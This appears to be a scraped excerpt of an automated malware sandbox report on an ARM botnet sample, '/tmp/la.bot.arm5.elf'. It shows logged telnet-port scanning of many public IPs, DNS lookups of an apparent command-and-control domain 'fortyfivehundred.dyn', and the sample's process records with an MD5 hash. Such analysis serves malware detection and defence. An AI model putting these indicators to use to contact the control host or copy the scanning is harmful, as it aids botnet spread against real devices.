          Oct 24, 2024 10:17:53.827863932 CEST4476423192.168.2.15221.255.213.98
          Oct 24, 2024 10:17:53.831779957 CEST6083023192.168.2.1513.231.190.190
          Oct 24, 2024 10:17:53.835585117 CEST4073623192.168.2.151.248.140.234
          Oct 24, 2024 10:17:53.839567900 CEST4308223192.168.2.15148.39.113.132
          Oct 24, 2024 10:17:53.843547106 CEST5188823192.168.2.15181.143.83.193
          Oct 24, 2024 10:17:53.847286940 CEST5891023192.168.2.156.22.211.33
          Oct 24, 2024 10:17:53.851254940 CEST4036223192.168.2.15182.177.88.49
          Oct 24, 2024 10:17:53.855181932 CEST6020823192.168.2.1553.109.96.158
          Oct 24, 2024 10:17:53.859184027 CEST3866023192.168.2.156.219.255.210
          Oct 24, 2024 10:17:53.863049030 CEST5559023192.168.2.15220.75.36.1
          Oct 24, 2024 10:17:53.866787910 CEST5302223192.168.2.15148.217.204.246
          Oct 24, 2024 10:17:53.870806932 CEST3821423192.168.2.15138.63.35.123
          Oct 24, 2024 10:17:53.874727964 CEST5921623192.168.2.15221.2.232.78
          Oct 24, 2024 10:17:53.878469944 CEST4335823192.168.2.15134.88.197.137
          Oct 24, 2024 10:17:53.882348061 CEST5969423192.168.2.15165.124.104.4
          Oct 24, 2024 10:17:53.886368990 CEST4053023192.168.2.15100.180.228.110
          Oct 24, 2024 10:17:53.890201092 CEST4632223192.168.2.15107.244.163.93
          Oct 24, 2024 10:17:53.894089937 CEST3699623192.168.2.15134.103.223.211
          Oct 24, 2024 10:17:53.897981882 CEST6006423192.168.2.1551.17.255.140
          Oct 24, 2024 10:17:53.901837111 CEST3391423192.168.2.15156.177.125.63
          Oct 24, 2024 10:17:53.905821085 CEST5091823192.168.2.15137.170.58.74
          Oct 24, 2024 10:17:53.909635067 CEST3832023192.168.2.15179.63.223.66
          Oct 24, 2024 10:17:53.913585901 CEST3992623192.168.2.159.215.117.225
          Oct 24, 2024 10:17:53.917978048 CEST3451623192.168.2.15133.40.145.47
          Oct 24, 2024 10:17:53.921946049 CEST6026823192.168.2.1596.112.121.1
          Oct 24, 2024 10:17:53.925829887 CEST4873023192.168.2.15120.24.79.240
          Oct 24, 2024 10:17:53.929455042 CEST3379423192.168.2.15122.129.179.145
          Oct 24, 2024 10:17:53.933463097 CEST5599623192.168.2.15166.42.119.130
          Oct 24, 2024 10:17:53.937416077 CEST3597823192.168.2.1589.113.242.0
          Oct 24, 2024 10:17:53.941217899 CEST5111223192.168.2.15105.117.10.194
          Oct 24, 2024 10:17:53.945064068 CEST4738623192.168.2.15157.157.93.100
          Oct 24, 2024 10:17:53.948430061 CEST5920223192.168.2.15186.250.30.239
          Oct 24, 2024 10:17:53.952315092 CEST4927823192.168.2.15191.109.43.179
          Oct 24, 2024 10:17:53.956017971 CEST4511023192.168.2.1548.234.236.135
          Oct 24, 2024 10:17:53.959863901 CEST5490823192.168.2.15114.69.254.172
          Oct 24, 2024 10:17:53.963932991 CEST4525223192.168.2.15122.84.159.66
          Oct 24, 2024 10:17:53.967762947 CEST3965623192.168.2.15212.120.234.149
          Oct 24, 2024 10:17:53.971606970 CEST5636423192.168.2.15205.0.29.162
          Oct 24, 2024 10:17:53.972954035 CEST2338278161.221.109.248192.168.2.15
          Oct 24, 2024 10:17:53.972969055 CEST2338038102.174.1.97192.168.2.15
          Oct 24, 2024 10:17:53.972984076 CEST234142417.40.227.46192.168.2.15
          Oct 24, 2024 10:17:53.972997904 CEST2346740172.147.90.98192.168.2.15
          Oct 24, 2024 10:17:53.973011971 CEST2333582203.19.251.101192.168.2.15
          Oct 24, 2024 10:17:53.973022938 CEST3827823192.168.2.15161.221.109.248
          Oct 24, 2024 10:17:53.973022938 CEST3803823192.168.2.15102.174.1.97
          Oct 24, 2024 10:17:53.973026991 CEST234408059.113.224.95192.168.2.15
          Oct 24, 2024 10:17:53.973026991 CEST4142423192.168.2.1517.40.227.46
          Oct 24, 2024 10:17:53.973046064 CEST4674023192.168.2.15172.147.90.98
          Oct 24, 2024 10:17:53.973057032 CEST2350120133.97.255.33192.168.2.15
          Oct 24, 2024 10:17:53.973062992 CEST3358223192.168.2.15203.19.251.101
          Oct 24, 2024 10:17:53.973071098 CEST2344770161.49.228.103192.168.2.15
          Oct 24, 2024 10:17:53.973082066 CEST4408023192.168.2.1559.113.224.95
          Oct 24, 2024 10:17:53.973087072 CEST2341962143.8.246.204192.168.2.15
          Oct 24, 2024 10:17:53.973093987 CEST5012023192.168.2.15133.97.255.33
          Oct 24, 2024 10:17:53.973104954 CEST2350070115.105.149.3192.168.2.15
          Oct 24, 2024 10:17:53.973114967 CEST4477023192.168.2.15161.49.228.103
          Oct 24, 2024 10:17:53.973119974 CEST234532434.134.164.18192.168.2.15
          Oct 24, 2024 10:17:53.973131895 CEST4196223192.168.2.15143.8.246.204
          Oct 24, 2024 10:17:53.973133087 CEST234224676.104.10.48192.168.2.15
          Oct 24, 2024 10:17:53.973145008 CEST5007023192.168.2.15115.105.149.3
          Oct 24, 2024 10:17:53.973148108 CEST2345726166.86.202.125192.168.2.15
          Oct 24, 2024 10:17:53.973154068 CEST4532423192.168.2.1534.134.164.18
          Oct 24, 2024 10:17:53.973161936 CEST233984617.51.108.80192.168.2.15
          Oct 24, 2024 10:17:53.973174095 CEST4572623192.168.2.15166.86.202.125
          Oct 24, 2024 10:17:53.973179102 CEST4224623192.168.2.1576.104.10.48
          Oct 24, 2024 10:17:53.973193884 CEST2335434154.252.184.121192.168.2.15
          Oct 24, 2024 10:17:53.973202944 CEST3984623192.168.2.1517.51.108.80
          Oct 24, 2024 10:17:53.973207951 CEST2344764221.255.213.98192.168.2.15
          Oct 24, 2024 10:17:53.973221064 CEST236083013.231.190.190192.168.2.15
          Oct 24, 2024 10:17:53.973234892 CEST23407361.248.140.234192.168.2.15
          Oct 24, 2024 10:17:53.973248005 CEST4476423192.168.2.15221.255.213.98
          Oct 24, 2024 10:17:53.973248005 CEST2343082148.39.113.132192.168.2.15
          Oct 24, 2024 10:17:53.973248005 CEST3543423192.168.2.15154.252.184.121
          Oct 24, 2024 10:17:53.973258018 CEST6083023192.168.2.1513.231.190.190
          Oct 24, 2024 10:17:53.973267078 CEST2351888181.143.83.193192.168.2.15
          Oct 24, 2024 10:17:53.973268986 CEST4073623192.168.2.151.248.140.234
          Oct 24, 2024 10:17:53.973288059 CEST4308223192.168.2.15148.39.113.132
          Oct 24, 2024 10:17:53.973309994 CEST5188823192.168.2.15181.143.83.193
          Oct 24, 2024 10:17:53.973679066 CEST23589106.22.211.33192.168.2.15
          Oct 24, 2024 10:17:53.973694086 CEST2340362182.177.88.49192.168.2.15
          Oct 24, 2024 10:17:53.973706961 CEST236020853.109.96.158192.168.2.15
          Oct 24, 2024 10:17:53.973721027 CEST23386606.219.255.210192.168.2.15
          Oct 24, 2024 10:17:53.973722935 CEST5891023192.168.2.156.22.211.33
          Oct 24, 2024 10:17:53.973733902 CEST2355590220.75.36.1192.168.2.15
          Oct 24, 2024 10:17:53.973745108 CEST4036223192.168.2.15182.177.88.49
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Oct 24, 2024 10:18:29.204694986 CEST192.168.2.15130.61.69.1230x56efStandard query (0)fortyfivehundred.dynA (IP address)IN (0x0001)false
          Oct 24, 2024 10:20:37.139236927 CEST192.168.2.151.1.1.10xf319Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
          Oct 24, 2024 10:20:37.139238119 CEST192.168.2.151.1.1.10x718aStandard query (0)daisy.ubuntu.com28IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Oct 24, 2024 10:18:29.212352037 CEST130.61.69.123192.168.2.150x56efNo error (0)fortyfivehundred.dyn156.244.19.135A (IP address)IN (0x0001)false
          Oct 24, 2024 10:18:29.212352037 CEST130.61.69.123192.168.2.150x56efNo error (0)fortyfivehundred.dyn103.253.147.242A (IP address)IN (0x0001)false
          Oct 24, 2024 10:20:37.147937059 CEST1.1.1.1192.168.2.150xf319No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
          Oct 24, 2024 10:20:37.147937059 CEST1.1.1.1192.168.2.150xf319No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

          System Behavior

          Start time (UTC):08:17:52
          Start date (UTC):24/10/2024
          Path:/tmp/la.bot.arm5.elf
          Arguments:/tmp/la.bot.arm5.elf
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
          Start time (UTC):08:17:52
          Start date (UTC):24/10/2024
          Path:/tmp/la.bot.arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
          Start time (UTC):08:17:52
          Start date (UTC):24/10/2024
          Path:/tmp/la.bot.arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
          Start time (UTC):08:17:52
          Start date (UTC):24/10/2024
          Path:/tmp/la.bot.arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
          Start time (UTC):08:17:52
          Start date (UTC):24/10/2024
          Path:/tmp/la.bot.arm5.elf
          Arguments:-
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1